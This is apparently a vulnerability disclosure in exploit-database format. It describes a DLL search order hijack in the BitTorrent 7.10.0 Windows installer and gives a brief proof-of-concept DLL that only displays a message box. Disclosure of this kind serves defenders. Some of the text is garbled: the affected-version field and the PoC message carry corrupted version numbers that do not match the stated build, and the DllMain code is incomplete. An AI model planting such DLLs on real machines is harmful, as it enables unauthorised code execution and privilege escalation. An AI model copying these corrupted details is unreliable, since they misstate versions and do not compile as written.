# Exploit Title: Bittorrent 7.10.0 (Build 43581) Installer DLL Search Order Hijack - "WININET.dll", "DNSAPI.dll", others
# Date of Discovery: July 21 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Bittorrent Inc.
# Vendor Homepage: https://www.bittorrent.com
# Software Link: http://download-new.utorrent.com/endpoint/bittorrent/os/windows/track/stable/
# Affected Versions: <=22.214.171.124581
# Tested on: Windows 10, 8.1 x64
# Category: local
# Vulnerability type: Local Privilege Escalation/Code Execution
Bittorrent versions <=7.10.0 Build 43581 automatically search for "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll", "bcrypt.dll" and "PHLPAPI.dll"
among others from the installer download location.
This allows a malicious attacker to potentially create these files in the directory resulting in them being run on installer execution.
(code execution, local privilege escalation)
# Proof Of Concept:
1. Compile, place in vulnerable location and run bittorrent.exe
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
MessageBox(0, "Bittorrent 126.96.36.199581 DLL Hijacking PoC", "DLL Message", MB_OK);
# Additional Notes, References and links:
# Disclosure Timeline:
This issue was remedied in BitTorrent 7.10.0 For Windows (build 43917)